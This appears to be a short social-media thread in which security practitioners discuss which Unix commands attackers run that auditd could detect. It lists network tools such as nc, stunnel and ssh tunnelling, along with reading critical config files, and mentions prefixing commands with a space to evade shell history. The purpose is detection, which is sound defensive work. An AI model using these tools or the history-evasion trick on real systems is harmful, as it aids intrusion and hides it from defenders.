A client just asked for info on *nix commands that are most often run by attackers vs. legitimate users that we can find with auditd. Some things I thought of: ssh tunneling params stunnel nc cat/head/tail/more/less <critical config files> What else? Any cheat sheets out there?
50
32
3
180
Replying to @MalwareJake
Interesting question: will auditd log the leading spaces if the attacker tries to put space at the beginning of a command-line to avoid history?

Sep 11, 2020 · 11:19 PM UTC

2
10
Replying to @hal_pomeranz
Ooh, I don't know.
1
3
No. You’d have to instrument the leader in the shell to get that. But an instrumented shell isn’t a bad idea anyhow.